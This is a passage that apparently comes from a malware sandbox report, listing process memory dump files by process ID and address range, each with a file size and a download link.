memory/2784-13614-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13808-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-10160-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13815-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13597-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-52-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13818-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13610-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13649-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-25-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2784-13613-0x0000000000400000-0x0000000000D25000-memory.dmp

Filesize
9.1MB

Download
memory/2808-13629-0x0000000003120000-0x0000000004915000-memory.dmp

Filesize
24.0MB

Download
memory/2808-9-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-13627-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-2-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-13630-0x0000000003120000-0x0000000004915000-memory.dmp

Filesize
24.0MB

Download
memory/2808-5-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-4-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2808-13650-0x0000000003120000-0x0000000004915000-memory.dmp

Filesize
24.0MB

Download
memory/2808-3-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-22-0x0000000002FD0000-0x00000000038F5000-memory.dmp

Filesize
9.1MB

Download
memory/2808-23-0x0000000002FD0000-0x00000000038F5000-memory.dmp

Filesize
9.1MB

Download
memory/2808-7-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-8-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-0-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-10-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2808-1-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp

Filesize
24.0MB

Download
memory/2936-13631-0x0000000000400000-0x0000000001BF5000-memory.dmp

Filesize
24.0MB

Download
memory/6204-13644-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/6204-13637-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6204-13638-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6204-13646-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6204-13639-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6204-13641-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6204-13643-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/6324-13579-0x00000000000E0000-0x00000000000F1000-memory.dmp

Filesize
68KB

Download
memory/8388-13789-0x0000000000080000-0x00000000000B0000-memory.dmp

Filesize
192KB

Download
memory/8388-13791-0x0000000000ED0000-0x0000000000FB3000-memory.dmp

Filesize
908KB

Download
memory/8388-13780-0x0000000000E00000-0x0000000000ECE000-memory.dmp

Filesize
824KB

Download
memory/9812-13595-0x0000000000120000-0x0000000000131000-memory.dmp

Filesize
68KB

Download
memory/9848-13817-0x00000000010B0000-0x000000000115C000-memory.dmp

Filesize
688KB

Download